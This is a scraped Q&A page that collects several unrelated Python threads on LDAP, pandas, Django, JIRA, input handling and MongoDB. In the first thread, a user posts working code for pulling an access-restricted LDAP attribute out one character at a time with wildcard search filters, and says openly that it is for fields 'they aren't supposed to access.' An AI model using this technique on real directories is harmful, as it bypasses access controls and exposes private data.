Binary search of unaccesible data field in ldap from python - python

I'm interested in reproducing a particular python script.
I have a friend who was accessing an ldap database, without authentication. There was a particular field of interest, we'll call it nin (an integer) for reference, and this field wasn't accessible without proper authentication. However, my friend managed to access this field through some sort of binary search (rather than just looping through integers) on the data; he would check the first digit, check if it was greater or less than the starting value, he would augment that until it returned a true value indicating existence, adding digits and continuing checking until he found the exact value of the integer nin.
Any ideas on how he went about this? I've access to a similarly set up database.

Your best bet would be to get authorization to access that field. You are circumventing the security of the database otherwise.

Figured it out. I just needed to filter on (&(cn=My name)(nin=guess*) and I managed to filter until it returns the correct result.
Code follows in case anyone else needs to find a field they aren't supposed to access, but can check results for and know the name of.
def lookup(self, username="", guess=0,verbose=0):
guin = guess
result_set = []
varsearch = "(&(name=" + str(username) + ")(" + "nin" + "=" + str(guin) + "*))"
result_id = self.l.search("", ldap.SCOPE_SUBTREE, varsearch, ["nin"])
while True:
try:
result_type, result_data = self.l.result(result_id, 0, 5.0)
if (result_data == []):
break
else:
if result_type == ldap.RES_SEARCH_ENTRY:
result_set.append(result_data)
except ldap.TIMEOUT:
return {"name": username}
if len(result_set) == 0:
return self.lookup(username, guin + 1,verbose)
else:
if guess < 1000000:
return self.lookup(username, guess * 10,verbose)
else:
if verbose==1:
print "Bingo!",
return str(guess)

Related

Pandas: Automatically generate incremental ID based on pattern

I want to create a dataframe, to which various users (name, phone number, address...) are continously being added. Now, I need a function, that automatically generates an ID once a new, non-existing user is added to the dataframe.
The first user should get the ID U000001, the second user the ID U000002 and so on.
What's the best way to do this?
If I'm understanding correctly, the main problem is the leading zeros. i.e. you can't just increment the previous ID, because typecasting '0001' just gives 1 instead of 0001. Please correct me if I'm wrong.
Anyways, here's what I came up with. It's far more verbose than you probably need, but I wanted to make sure my logic was clear.
def foo(previous):
"""
Takes in string of format 'U#####...'
Returns incremented value in same format.
Returns None if previous already maxed out (i.e. 'U9999')
"""
value_str = previous[1:] # chop off 'U'
value_int = int(value_str) # get integer value
new_int = value_int + 1 # increment
new_str = str(new_int) # turn back into string
# return None if exceeding character limit on ID
if len(new_str) > len(value_str):
print("Past limit")
return(None)
# add leading zeroes
while(len(new_str) < len(value_str)):
new_str = '0' + new_str
# add 'U' and return
return('U' + new_str)
Please let me know if I can clarify anything! Here's a script you can use to test it:
# test
current_id = 'U0001'
while(True):
current_id = foo(current_id)
print(current_id)
if current_id == None:
break

Increment Model Field Inside Get Or Create Django

I am developing a music web application where I am trying to calculate the number of times a song was played. When the play button is clicked, a function called getLink() is called. Here, I try to use get_or_create to update the PlayCount model, like so.
h = PlayCount.objects.all()
if len(h) == 0:
u = PlayCount.objects.get_or_create(
user=request.user.username,
song=song,
plays=1,
)[0]
u.save()
else:
flag = False
for i in h:
if i.song == song:
u = PlayCount.objects.get_or_create(
user=request.user.username,
song=song,
plays=plays + 1,
)[0]
u.save()
flag = True
break
else:
pass
if flag is False:
u = PlayCount.objects.get_or_create(
user=request.user.username,
song=song,
plays=1,
)[0]
u.save()
else:
pass
However, when I enter the else loop, 127.0.0.1:8000 returns play is not defined.
How may I proceed?
I don't understand why you loop through all the PlayCount objects when all you need is to find the one for the specific user and song.
Note also that get_or_create will only find the specific object that matches all the parameters you pass to it, so get_or_create(user=..., song=..., plays=...) will try finding the one with the exact number of plays you specify which isn't what you want.
You only need to do this:
from django.db.models import F
play_counter, created = PlayCount.objects.get_or_create(
user=request.user,
song=song,
defaults={'plays': 1})
if not created:
play_counter.plays = F('plays') + 1
play_counter.save()
So here we first fetch or create the counter for the particular song and user. If we create it, we set plays to 1 by setting it in the defaults parameter.
Then, if it is not created (i.e. it's an existing one), we increment plays by 1, using the F expression, which ensures it's updated in the database directly (and there's no risk of database inconsistency due if another request is updating the same value).

Get list of all JIRA issues (python)

I am trying to get a list of all JIRA issues so that I may iterate through them in the following manner:
from jira import JIRA
jira = JIRA(basic_auth=('username', 'password'), options={'server':'https://MY_JIRA.atlassian.net'})
issue = jira.issue('ISSUE_KEY')
print(issue.fields.project.key)
print(issue.fields.issuetype.name)
print(issue.fields.reporter.displayName)
print(issue.fields.summary)
print(issue.fields.comment.comments)
The code above returns the desired fields (but only an issue at a time), however, I need to be able to pass a list of all issue keys into:
issue = jira.issue('ISSUE_KEY')
The idea is to write a for loop that would go through this list and print the indicated fields.
I have not been able to populate this list.
Can someone point me in the right direction please?
def get_all_issues(jira_client, project_name, fields):
issues = []
i = 0
chunk_size = 100
while True:
chunk = jira_client.search_issues(f'project = {project_name}', startAt=i, maxResults=chunk_size, fields=fields)
i += chunk_size
issues += chunk.iterable
if i >= chunk.total:
break
return issues
issues = get_all_issues(jira, 'JIR', ["id", "fixVersion"])
options = {'server': 'YOUR SERVER NAME'}
jira = JIRA(options, basic_auth=('YOUR EMAIL', 'YOUR PASSWORD'))
size = 100
initial = 0
while True:
start= initial*size
issues = jira.search_issues('project=<NAME OR ID>', start,size)
if len(issues) == 0:
break
initial += 1
for issue in issues:
print 'ticket-no=',issue
print 'IssueType=',issue.fields.issuetype.name
print 'Status=',issue.fields.status.name
print 'Summary=',issue.fields.summary
The first 3 arguments of jira.search_issues() are the jql query, starting index (0 based hence the need for multiplying on line 6) and the maximum number of results.
You can execute a search instead of a single issue get.
Let's say your project key is PRO-KEY, to perform a search, you have to use this query:
https://MY_JIRA.atlassian.net/rest/api/2/search?jql=project=PRO-KEY
This will return the first 50 issues of the PRO-KEY and a number, in the field maxResults, of the total number of issues present.
Taken than number, you can perform others searches adding the to the previous query:
&startAt=50
With this new parameter you will be able to fetch the issues from 51 to 100 (or 50 to 99 if you consider the first issue 0).
The next query will be &startAt=100 and so on until you reach fetch all the issues in PRO-KEY.
If you wish to fetch more than 50 issues, add to the query:
&maxResults=200
You can use the jira.search_issues() method to pass in a JQL query. It will return the list of issues matching the JQL:
issues_in_proj = jira.search_issues('project=PROJ')
This will give you a list of issues that you can iterate through
Starting with Python3.8 reading all issues can be done relatively short and elegant:
issues = []
while issues_chunk := jira.search_issues('project=PROJ', startAt=len(issues)):
issues += list(issue issues_chunk)
(since we need len(issues) in every step we cannot use a list comprehension, can we?
Together with initialization and cashing and "preprocessing" (e.g. just taking issue.raw) you could write something like this:
jira = jira.JIRA(
server="https://jira.at-home.com",
basic_auth=json.load(open(os.path.expanduser("~/.jira-credentials")))
validate=True,
)
issues = json.load(open("jira_issues.json"))
while issues_chunk := jira.search_issues('project=PROJ', startAt=len(issues)):
issues += [issue.raw for issue issues_chunk]
json.dump(issues, open("jira_issues.json", "w"))

Python define and call function - method behavior changing upon processing user input

I defined a method, like so:
class MyDatastructure(object):
# init method here
def appending(self, elem):
self.data.append(elem)
if self.count >= self.size:
print "popping " + str(self.data[0])
print "inserting " + str(elem)
self.data.pop(0)
elif self.count < self.size:
self.count += 1
print "count after end of method " + str(self.count)
I tested it out, and it worked as supposed to.
Underneath this definition, I wanted to process some user input and use this method. However, it doesn't enter the if case anymore! Any idea why?
# in the same file
def process_input():
while True:
# getting user input
x = raw_input()
ds = MyDatastructure(x) # creating data structure of size, which was taken from user input, count initially 0
ds.appending(1)
ds.appending(2)
ds.appending(3)
# Still appending and NOT popping, even though the if in appending doesn't allow it!
# This functionality works if I test it without user input!
The problem is with this line:
x = raw_input()
Calling raw_input will return a string. If I type in the number 3, that means that the data structure will assign the string "3" to the size.
Attempting to compare a string to a number is considered undefined behavior, and will do weird things -- see this StackOverflow answer. Note that Python 3 fixes this piece of weirdness -- attempting to compare a string to an int will cause a TypeError exception to occur.
Instead, you want to convert it into an int so you can do your size comparison properly.
x = int(raw_input())

pymongo taking over 24 hours to loop through 200K records

I have two collections in a db page and pagearchive I am trying to clean up. I noticed that new documents were being created in the pagearchive instead of adding values to embedded documents as intended. So essentially what this script is doing is going through every document in page and then finding all copies of that document in pagearchive and moving data I want into a single document and deleted the extras.
The problem is there is only 200K documents in pagearchive and based on the count variable I am printing at the bottom, it's taking anywhere from 30min to 60+ min to iterate through 1000 records. This is extremely slow. The largest count in duplicate docs I have seen is 88. But for the most part when I query in pageArchive on uu, I see 1-2 duplicate documents.
mongodb is on a single instance 64 bit machine with 16GB of RAM.
The uu key that is being iterating on the pageArchive collection is a string. I made sure there was an index on that field db.pagearchive.ensureIndex({uu:1}) I also did a mongod --repair for good measure.
My guess is the problem is with my sloppy python code (not very good at it) or perhaps something I am missing that is necessary for mongodb. Why is it going so slow or what can I do to speed it up dramatically?
I thought maybe because the uu field is a string it's causing a bottleneck, but that's the unique property in the document (or will be once I clean up this collection). On top of that, when I stop the process and restart it, it speeds up to about 1000 records a second. Until it starts finding duplicates again in the collection, then it goes dog slow again (deleting about 100 records every 10-20 minutes)
from pymongo import Connection
import datetime
def match_dates(old, new):
if old['coll_at'].month == new['coll_at'].month and old['coll_at'].day == new['coll_at'].day and old['coll_at'].year == new['coll_at'].year:
return False
return new
connection = Connection('dashboard.dev')
db = connection['mydb']
pageArchive = db['pagearchive']
pages = db['page']
count = 0
for page in pages.find(timeout=False):
archive_keep = None
ids_to_delete = []
for archive in pageArchive.find({"uu" : page['uu']}):
if archive_keep == None:
#this is the first record we found, so we will store data from duplicate records with this one; delete the rest
archive_keep = archive
else:
for attr in archive_keep.keys():
#make sure we are dealing with an embedded document field
if isinstance(archive_keep[attr], basestring) or attr == 'updated_at':
continue
else:
try:
if len(archive_keep[attr]) == 0:
continue
except TypeError:
continue
try:
#We've got our first embedded doc from a property to compare against
for obj in archive_keep[attr]:
if archive['_id'] not in ids_to_delete:
ids_to_delete.append(archive['_id'])
#loop through secondary archive doc (comparing against the archive keep)
for attr_old in archive.keys():
#make sure we are dealing with an embedded document field
if isinstance(archive[attr_old], basestring) or attr_old == 'updated_at':
continue
else:
try:
#now we know we're dealing with a list, make sure it has data
if len(archive[attr_old]) == 0:
continue
except TypeError:
continue
if attr == attr_old:
#document prop. match; loop through embedded document array and make sure data wasn't collected on the same day
for obj2 in archive[attr_old]:
new_obj = match_dates(obj, obj2)
if new_obj != False:
archive_keep[attr].append(new_obj)
except TypeError, te:
'not iterable'
pageArchive.update({
'_id':archive_keep['_id']},
{"$set": archive_keep},
upsert=False)
for mongoId in ids_to_delete:
pageArchive.remove({'_id':mongoId})
count += 1
if count % 100 == 0:
print str(datetime.datetime.now()) + ' ### ' + str(count)
I'd make following changes to code:
in match_dates return None instead False and do if new_obj is not None: it will check reference, without calling object __ne__ or __nonzero__.
for page in pages.find(timeout=False): If only uu key is used and pages are big, fields=['uu'] parameter to find should speedup queries.
archive_keep == None to archive_keep is None
archive_keep[attr] is called 4 times. It will be little faster to save keep_obj = archive_keep[attr] and then use keep_obj.
change ids_to_delete = [] to ids_to_delete = set(). Then if archive['_id'] not in ids_to_delete: will be O(1)

Categories

Resources